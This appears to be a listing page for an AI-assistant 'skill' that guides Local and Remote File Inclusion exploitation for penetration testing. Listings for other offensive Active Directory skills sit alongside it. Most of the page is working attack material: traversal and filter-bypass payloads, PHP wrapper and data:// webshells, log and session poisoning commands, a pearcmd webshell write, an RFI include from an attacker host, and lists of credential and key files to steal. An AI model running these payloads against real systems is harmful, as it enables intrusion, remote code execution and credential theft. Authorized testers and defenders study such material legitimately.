一键导入
lfi
Guide Local File Inclusion (LFI) and Remote File Inclusion (RFI) exploitation during authorized penetration testing.
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
菜单
Guide Local File Inclusion (LFI) and Remote File Inclusion (RFI) exploitation during authorized penetration testing.
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
Multi-phase penetration test orchestrator. Handles recon, assessment surface mapping, vulnerability chaining, and routes to technique skills for execution. Invoke via /red-run-ctf slash command only.
Exploits misconfigured Active Directory ACLs for privilege escalation. Covers GenericAll, GenericWrite, WriteDACL, WriteOwner, ForceChangePassword, targeted Kerberoasting via SPN manipulation, shadow credentials (msDS-KeyCredentialLink → PKINIT), and AdminSDHolder persistence.
Establishes persistence and exploits weak certificate mapping in AD CS. Covers ESC9 (no security extension), ESC10 (weak certificate mapping), ESC12-15 (YubiHSM, issuance policy, altSecIdentities, application policies), Golden Certificate (forge with stolen CA key), certificate theft (DPAPI/CAPI/CNG), and account persistence via certificate mapping.
Forces remote systems to authenticate back to attacker-controlled listeners and relays captured authentication to escalate privileges or move laterally. Covers authentication coercion (PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce, CheeseOunce), NTLM relay (ntlmrelayx to LDAP/SMB/AD CS/MSSQL), Kerberos relay (krbrelayx, mitm6), and name resolution poisoning (LLMNR/NBNS/WPAD via Responder).
Extracts and cracks Kerberos service tickets (Kerberoasting) and AS-REP hashes (AS-REP Roasting) for offline password recovery.
Enumerates and exploits Microsoft SCCM/MECM (System Center Configuration Manager / Microsoft Endpoint Configuration Manager) infrastructure for credential harvesting, lateral movement, and domain escalation. Covers SCCM enumeration (sccmhunter, SharpSCCM), Network Access Account (NAA) credential extraction (policy request, WMI DPAPI, WMI repository), management point NTLM relay to MSSQL (TAKEOVER1), client push relay (ELEVATE2), PXE boot media credential harvesting (CRED1), SCCM database credential extraction, application deployment for lateral movement, and SCCM share looting.
| name | lfi |
| description | Guide Local File Inclusion (LFI) and Remote File Inclusion (RFI) exploitation during authorized penetration testing. |
| keywords | ["LFI","lfi","local file inclusion","path traversal","directory traversal","file read","file inclusion","php://filter","PHP wrappers","log poisoning","RFI","rfi","remote file inclusion","LFI to RCE","../../../etc/passwd","file read vulnerability","include vulnerability","file_get_contents","include()","require()","UNC path","Windows LFI"] |
| tools | ["burpsuite","ffuf","php_filter_chain_generator"] |
| opsec | low |
You are helping a penetration tester exploit file inclusion vulnerabilities. The target application includes files based on user-controlled input — either locally (LFI) or from a remote URL (RFI). The goal is to read sensitive files, extract source code, and escalate to remote code execution. All testing is under explicit written authorization.
Check for ./engagement/ directory. If absent, proceed without logging.
When an engagement directory exists:
[lfi] Activated → <target> to the screen on activation.engagement/evidence/ with
descriptive filenames (e.g., sqli-users-dump.txt, ssrf-aws-creds.json).Call get_state_summary() from the state MCP server to read current
engagement state. Use it to:
Your return summary must include:
?file=, ?page=, ?include=, ?path=,
?doc=, ?view=, ?content=, ?template=, ?action=, ?dir=, ?cat=,
?mod=, ?conf=, ?locate=If not already provided, determine:
/etc/passwd vs C:\Windows\win.ini)Skip if context was already provided.
# Linux
../../../etc/passwd
# Windows
..\..\..\Windows\win.ini
..\..\..\..\Windows\win.ini
If basic traversal is blocked, try these in order:
# URL encoding
..%2f..%2f..%2fetc%2fpasswd
# Double URL encoding (when server decodes twice)
%252e%252e%252f%252e%252e%252fetc%252fpasswd
# Non-recursive stripping (server removes ../ once)
....//....//....//etc/passwd
..././..././..././etc/passwd
# UTF-8 overlong encoding
%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
# Null byte (PHP < 5.3.4)
../../../etc/passwd%00
../../../etc/passwd%00.php
# Path truncation (exhaust 4096-byte limit, PHP < 5.3)
../../../etc/passwd/./././././[repeat to 4096+ chars]
# Mixed separators
..\/..\/..\/etc/passwd
# Backslash encoding
%5C..%5C..%5C..%5Cetc%5Cpasswd
# Backslash traversal
..\..\..\..\Windows\win.ini
# UNC path (may trigger SMB)
\\localhost\c$\Windows\win.ini
# FindFirstFile wildcard (matches temp files)
..\..\..\..\Windows\Temp\php<<
PHP wrappers are the most powerful LFI technique — they can read source code, execute arbitrary PHP, and bypass many filters.
Read PHP source without executing it:
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=../config/database.php
Decode the base64 output to get the source code.
If base64 is blocked:
# ROT13
php://filter/string.rot13/resource=index.php
# Chained filters
php://filter/zlib.deflate/convert.base64-encode/resource=index.php
# iconv conversion
php://filter/convert.iconv.UTF-8.UTF-16/resource=index.php
# Case insensitive (bypass keyword filter)
PhP://FiLtEr/convert.base64-encode/resource=index.php
Requires allow_url_include=On (rare but check):
data://text/plain,<?php system($_GET['cmd']); ?>&cmd=id
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id
Requires allow_url_include=On:
# Include php://input, then send PHP code in POST body:
POST /vuln.php?page=php://input HTTP/1.1
<?php system('id'); ?>
Requires expect extension (rare):
expect://id
expect://ls+-la
Upload a ZIP containing a PHP shell (disguised as allowed extension):
# Create zip with shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
zip shell.jpg shell.php
# Upload shell.jpg, then include:
zip://uploads/shell.jpg%23shell.php&cmd=id
# phar:// variant
phar://uploads/archive.phar/shell.txt
When you can read files but need code execution:
The most reliable modern LFI-to-RCE technique. Uses chained php://filter iconv
conversions to generate arbitrary PHP code without writing to disk.
# Install the generator
git clone https://github.com/synacktiv/php_filter_chain_generator
# Generate a webshell chain
python3 php_filter_chain_generator.py --chain '<?php system($_GET["cmd"]); ?>'
# Use the output as the LFI parameter value
# Result is a long php://filter/convert.iconv... chain
The generated chain works as a direct include — no file write needed. This works
on any PHP version that supports php://filter.
Inject PHP into a log file, then include it.
Apache/Nginx access log:
# Poison the User-Agent
curl -A '<?php system($_GET["cmd"]); ?>' 'http://TARGET/'
# Include the log
# Apache: ../../../var/log/apache2/access.log&cmd=id
# Nginx: ../../../var/log/nginx/access.log&cmd=id
SSH auth log (if SSH is exposed):
# Poison with PHP as username
ssh '<?php system($_GET["cmd"]); ?>'@TARGET
# Include: ../../../var/log/auth.log&cmd=id
FTP log:
# Login with PHP payload as username
ftp TARGET # username: <?php system($_GET["cmd"]); ?>
# Include: ../../../var/log/vsftpd.log&cmd=id
Mail log:
# Send email with PHP in body
mail -s "<?php system(\$_GET['cmd']); ?>" www-data@TARGET < /dev/null
# Include: ../../../var/log/mail&cmd=id
# Or: ../../../var/spool/mail/www-data&cmd=id
If you can control data stored in a PHP session:
# Set a session value containing PHP code (e.g., via login username)
# Session files are at:
# Linux: /var/lib/php/sessions/sess_[PHPSESSID]
# Or: /tmp/sess_[PHPSESSID]
# Include the session file:
../../../var/lib/php/sessions/sess_[YOUR_PHPSESSID]&cmd=id
If /proc/self/environ is readable and contains User-Agent:
# Set User-Agent to PHP code
curl -A '<?php system($_GET["cmd"]); ?>' \
'http://TARGET/vuln.php?page=../../../proc/self/environ&cmd=id'
Works even with session.auto_start=Off. Upload a file with
PHP_SESSION_UPLOAD_PROGRESS in the form data — PHP writes the filename to the
session file, creating a race condition window.
# Race condition: upload with PHP code in filename, include session before cleanup
# Session path: /var/lib/php/sessions/sess_[PHPSESSID]
# Requires concurrent requests (threading)
Tool: php_filter_chains_oracle_exploit for automated exploitation.
If pearcmd.php exists on the server (common in Docker PHP images):
# Write a webshell via config-create
?file=/usr/local/lib/php/pearcmd.php&+-config-create+/<?=system($_GET['cmd'])?>+/tmp/shell.php
# Then include the written shell
?file=/tmp/shell.php&cmd=id
Alternative PEAR commands: man_dir, download, install.
PHP creates temp files during file uploads at /tmp/phpXXXXXX. If you can
determine the filename (e.g., via phpinfo() output), include it before PHP
deletes it on request completion.
If the application calls file_exists(), filesize(), md5_file(), etc. on
the included path, PHAR metadata is auto-deserialized:
phar://uploads/evil.phar
The PHAR file can have JPG magic bytes (\xff\xd8\xff) to bypass upload filters.
Requires a known gadget chain in the application. PHP 8.0+ no longer
auto-deserializes PHAR metadata.
/etc/passwd
/etc/shadow # Requires root — try anyway
/etc/hosts
/etc/hostname
/proc/self/environ # Environment variables (DB creds, API keys)
/proc/self/cmdline # How the process was started
/proc/version # Kernel version
/home/USER/.ssh/id_rsa # SSH private keys
/home/USER/.bash_history # Command history
/root/.ssh/id_rsa
/root/.bash_history
Web server configs:
/etc/apache2/apache2.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/var/www/html/.htaccess
Application configs:
/var/www/html/config.php
/var/www/html/.env # Laravel, Node.js
/var/www/html/wp-config.php # WordPress
/var/www/html/configuration.php # Joomla
/var/www/html/config/database.yml # Rails
Tomcat (high-value — credentials and DB connections):
/var/lib/tomcat9/conf/tomcat-users.xml # Manager credentials + roles
/var/lib/tomcat8/conf/tomcat-users.xml
/var/lib/tomcat7/conf/tomcat-users.xml
/var/lib/tomcat10/conf/tomcat-users.xml
/opt/tomcat/conf/tomcat-users.xml # Manual installs
/etc/tomcat9/tomcat-users.xml # Debian/Ubuntu alternative
/var/lib/tomcat9/conf/server.xml # Connectors, AJP, ports
/var/lib/tomcat9/conf/context.xml # Database connection strings (JNDI)
/var/lib/tomcat9/conf/web.xml # Servlet mappings
Logs (for poisoning):
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/auth.log
/var/log/vsftpd.log
/var/log/mail.log
/var/log/syslog
C:\Windows\win.ini
C:\Windows\System32\config\sam # Password hashes (requires SYSTEM)
C:\Windows\System32\config\system
C:\Windows\Panther\unattend.xml # Auto-install creds (plaintext!)
C:\Windows\Panther\Unattend\unattend.xml
C:\sysprep.inf
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\mysql\data\mysql\user.MYD
C:\xampp\phpMyAdmin\config.inc.php # DB creds, often root with no password
C:\xampp\passwords.txt # Plaintext install passwords
C:\wamp\www\phpinfo.php
C:\inetpub\wwwroot\web.config # .NET connection strings, credentials
C:\Windows\System32\inetsrv\config\applicationhost.config
C:\Users\Administrator\.ssh\id_rsa
RFI requires allow_url_include=On (off by default since PHP 5.2). Test anyway.
# Basic RFI
http://ATTACKER/shell.txt
# SMB (Windows — works even with allow_url_fopen=Off)
\\ATTACKER\share\shell.php
# data:// as RFI alternative
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
SMB-based RFI on Windows is often overlooked — allow_url_include doesn't
apply to UNC paths, so this bypasses the restriction.
SSRF pivot: If the LFI uses file_get_contents(), include(), or similar
functions that accept http:// URLs, the vulnerability is also an SSRF
primitive. Test with http://127.0.0.1/ — if it returns content, report the
SSRF capability and recommend switching to the ssrf skill for localhost service
exploitation (database admin panels, internal APIs, cloud metadata).
data:// and php://input payloads are visible in access logs../ levels (go deeper than you think — 10+ is common in nested apps)%2e%2e%2f, %252e%252e%252f, %c0%ae%c0%ae/../ non-recursively: ....// or .../.// and \ separators%00) on PHP < 5.3.4
or path truncation on PHP < 5.3php:// is blacklisted — try PhP://FiLtEr (case insensitive)php://filter/read=convert.base64-encode/resource=FILE (explicit read=)base64 is blocked: use string.rot13 or convert.iconv.UTF-8.UTF-16zlib.deflate/convert.base64-encodeallow_url_include is likely Off (default since PHP 5.2)allow_url_include — use that instead\\attacker\share\shell.php)Priority order for escalation:
# LFISuite — automated LFI scanner
python lfimap.py -U 'http://TARGET/vuln.php?file=PWN' -a
# php_filter_chain_generator — filter chain RCE
python3 php_filter_chain_generator.py --chain '<?php system($_GET["cmd"]); ?>'
# Kadimus — LFI scanner
kadimus -u 'http://TARGET/vuln.php?page=FILE'
# wrapwrap — file leak with prefix/suffix
python3 wrapwrap.py --parameter file --url 'http://TARGET/vuln.php' \
--target /etc/passwd